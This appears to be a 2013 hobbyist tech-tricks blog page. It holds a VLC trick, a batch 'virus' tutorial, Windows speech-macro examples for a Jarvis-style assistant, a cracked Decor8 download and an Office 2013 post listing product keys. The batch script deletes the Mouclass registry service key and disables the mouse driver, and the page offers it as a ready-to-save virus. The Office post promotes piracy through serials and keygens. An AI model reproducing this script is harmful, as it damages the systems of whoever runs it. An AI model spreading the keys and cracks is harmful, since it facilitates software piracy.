Tuesday 23 July 2013

................................................................................................................................................
 Awesome vlc media player tricks
……………………………………...............................................................................................
vlc tricks

In this tutorial I will share simple yet interesting trick I came across while surfing on the internet. I will call it vlc Inception trick. This trick is simple works on
Win xp, win 7and win 8. If you know this trick then its great if you don’t then lets dive into it.
………………………………………………………………………………………………
How to do this trick.    
………………………………………………………………………………………………
1. Open vlc media player.
2. Then press ctrl+N.
3. Now type “screen://”(without quotes)
4. Click on play and watch this simple trick.

………………………………………………………………………………………………
Make a virus that Disable mouse
................................................................................................................................................


 I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmful it will disable your mouse so think before trying it on yourself.

  • Open Notepad and copy below codes
  • Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as virus. bat
  • Done you just created your virus.
................................................................................................................................................ MAKE YOUR COMPUTER TALK LIKE IRON MAN'S JARVIS
………………………………………………………………………………………………………………………………………………
You Must have Watched The Movie "IRON MAN","The Avengers" and Tony Stark's Talking Computer "Jarvis". Despite being busy, i saw the movie "iron" few months ago and since then I was thinking to make something like "Jarvis"

The project development on "human computer interface" and "Gestural interface" has already been started by my side, which are capable of having feature like voice recognition,gestural interfaces. Some of those projects have been partially developed and working in desired manner, but few features and modules are yet to implement and on their way of completion in very short span of time.
So lets come to the body of this article. The reason of writing this post for my readers is to share what I've achieved till yet in this journey of 
Artificial Intelligence. Here is one gift for my readers in the form of a PROJECT with the topic "how make your computer talk like Jarvis".
Jarvis is totally based on 
Artificial intelligence aka Artificial Brain. Eventually, we can't such a huge artificial brain by using these following steps because of the simplicity and efficiency of this project. But I can make you assure that after this you make your computer talk, and this will be your first interestingly step in the world of Artificial intelligence. And later, you can go in more deeper as soon as you'll come to know its depth. So Lets start with your first step in this world with this example :
Example 1 :
Give a Name to your Computer  Like "Jarvis" and when you'll say "Jarvis" it will reply "Hello sir" or "Hello Mr. (Your Name)".
 or
You : Who are you ??
Computer : I'm chitti The robo Speed, 1 terahertz, memory, one  zettabyte
(Just Like Rajnikanth's Movie "robot", (Enthiran) in Tamil.)

Example 2:
YOU:  Good Morning Jarvis!
COMPUTER: Good Morning Mr. Stark! How are you Today!

So, little wondering how these things going to work out? Here you can transform your wondering into reality. Follow these codes:

Example 1 : 
<listenFor>Jarvis</listenFor>
<speak>Hello Mr. STark</speak>
</command>
</speechMacros>

Example 2 :
<listenFor>Good Morning Jarvis</listenFor>
<speak>Good Morning Sir. how are you today</speak>
</command>
</speechMacros>

Further, more you can use these lines of codes for Shutting down Computer :
<speechMacros>
<command>
<listenFor>Nuke it</listenFor>
<speak>Restarting Windows</speak>
<run command="C:\Windows\System32\shutdown.exe"/>
</command>
</speechMacros>

To make it more intresting and realastic you need a bit knwoledge of VB.NET
here is one example

<speechMacros>
<command>
<listenFor>Time</listenFor>
<listenFor>Give me the Time</listenFor>
<listenFor>What is the time</listenFor>
<listenFor>Tell me the time</listenFor>
<listenFor>What time is it</listenFor>
<script language="vbscript">
<![CDATA[
dim currentTime
currentTime = FormatDateTime(Time(), 1)
Application.Speak Time
Application.SetTextFeedback Time
]]>
</script>
</command>

now i have ms exel work then..

<command priority="100">
  <listenFor>insert row above</listenFor>
  <sendKeys>{ALT}jla</sendKeys>
</command>
<command priority="100">
  <listenFor>insert row below</listenFor>
  <sendKeys>{ALT}jle</sendKeys>
</command>
<command priority="100">
  <listenFor>insert column before</listenFor>
  <sendKeys>{ALT}jll</sendKeys>
</command>
<command priority="100">
  <listenFor>insert column after</listenFor>
  <sendKeys>{ALT}jlr</sendKeys>
</command>
<command priority="100">
  <listenFor>merge cells</listenFor>
  <sendKeys>{ALT}jlm</sendKeys>
</command>
<command priority="100">
  <listenFor>split table</listenFor>
  <sendKeys>{ALT}jlq</sendKeys>
</command>
<command priority="100">
  <listenFor>delte row</listenFor>
  <listenFor>delte rows</listenFor>
  <sendKeys>{ALT}jdr</sendKeys>
</command>
<command priority="100">
  <listenFor>delete column</listenFor>
  <listenFor>delete columns</listenFor>
  <sendKeys>{ALT}jdc</sendKeys>
</command>
<command priority="100">
  <listenFor>?show table properties</listenFor>
  <sendKeys>{ALT}jdo</sendKeys>
</command>
<command priority="100">
  <listenFor>?show ?hide table gridlines</listenFor>
  <sendKeys>{ALT}jltg</sendKeys>
</command>


Track chnages in Music
<command priority="100">
  <listenFor>next change</listenFor>
  <sendKeys>{ALT}rh</sendKeys>
</command>
<command priority="100">
  <listenFor>accept change</listenFor>
  <sendKeys>{ALT}rac</sendKeys>
</command> 


To click
<command priority="100">
 <listenFor>?mouse click</listenFor>   <mouse button="left" command="click" />
</command>
if you need codes of any command leave comment below, and i will try to give you source codes.


How to Get Started  ??
Things you need -
A microphone or internal Microphone
windows 7 and windows speech macros, download it from here
install it then make Macros to start work 
Now open notepad and paste code in notepad 
for example 
<listenFor>Jarvis</listenFor>
<speak>Hello Mr. STark</speak>
</command>
</speechMacros>
paste it and save as filename.WSRMac
.WSRMac extention is must for it,
then Goto your WSRMac file and click on
Now click on "import signing Cerificate" and automaticly it will save a digital signature for it.
                                                             s
                                        cats2.jpg (320×194)
Now open Speech recognition            
                                                    
Now Give Your Instructions, you can minizmise to hide this window




Enjoy Talking to your Computer ! :D


Tuesday 2 July 2013

Stardock Decor8 Full Version Cracked Download

Stardock Decor8 Full Version Cracked Download

Windows 8 limits your start screen customization options to only a few provided background images and a few pre-defined color schemes.
Decor8 removes these limitations and provides the freedom to personalize your start screen with your own images and colors.
Features:
  • Choose from more background images to personalize your start screen.
  • Add your own photos and images – Select multiple images to create a custom slideshow
  • Randomize background images in timed intervals for a fresh look.
  • Apply effects to scroll, fade, blur, recolor and add contrast to your background images
  • Choose your own image for your lock screen background

Background Images

Choose from more background images to personalize your start screen.
  • Add your own photos and images
  • Select multiple images to create a custom slideshow
  • Randomize background images in timed intervals for a fresh look
  • Apply effects to scroll, fade, blur, recolor and add contrast to your background images
  • Choose your own image for your lock screen background

Color Schemes

Decor8 will automatically create a color scheme to match each of your background images.
Or you can customize the color scheme, it’s up to you. Custom color schemes can also be applied to your charms bar.
 

Customization:

Control how many rows of tiles are available on your start screen.
 




        

                                   click here to download







Monday 1 July 2013

Microsoft Office 2013 Plus Free Download Full Version


System Requirements:
  • 1 Ghz Processore (32 Bit or 64 Bit)
  • 1 GB of RAM (32 bit) or 2 GB of RAM (64 Bit)
  • 3 GB Hard Drive Space
  • Operating System: Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012
  • Net Framework 3.5, 4.0, Or 4.5
Download via Microsoft (Single Link): 
  • Download | 32 Bit | Microsoft Office Professional Plus 2013 Preview -(625 MB)

  • Download | 64 Bit | Microsoft Office Professional Plus 2013 Preview -(702 MB)
                                               
                                                click here to download

Tags: MS OFFICE 2013 latest version free download, ms office 2013 full version with serial free download, 2013 full version with working keygen free download, microsoft office latest version with working serial free download 2013

Keygen....
Y89N6-KWWJX-YHFVP-DWMGK-XKR9J
==========
NVWXW-WWVFR-D6HKK-MW2BD-DV2KJ
==========
MT7NR-6GWBK-QGHBV-2YBFG-72V28
==============
JR3N8-YV72J-86V92-HC2PM-PRXTW
==========
6QD6N-J7FQ2-HBMW2-KFJ29-JW728
=============                                                                                                   
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK

4TBVN-9C666-WQBDD-FM3HX-DYDG
OFFICE 2013 PRO PLUS MSDN RETAIL:

2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK

MH2KN-96KYR-GTRD4-KBKP4-Q9JP9

OFFICE 2013 VISIO PRO PLUS MSDN RETAIL:

 K6NC7-KMX7G-TC6RR-FDM23-8K6YQ 

 OFFICE 2013 PROJECT PRO PLUS MSDN RETAIL:

 2NDRT-M9QTH-2BKP3-HPRVC-J42B9 
828CH-G4FPY-HMH4R-32GCK-6D9BH
-or-
3W3MQ-H7M6X-3WYP7-TPCH6-8G8T2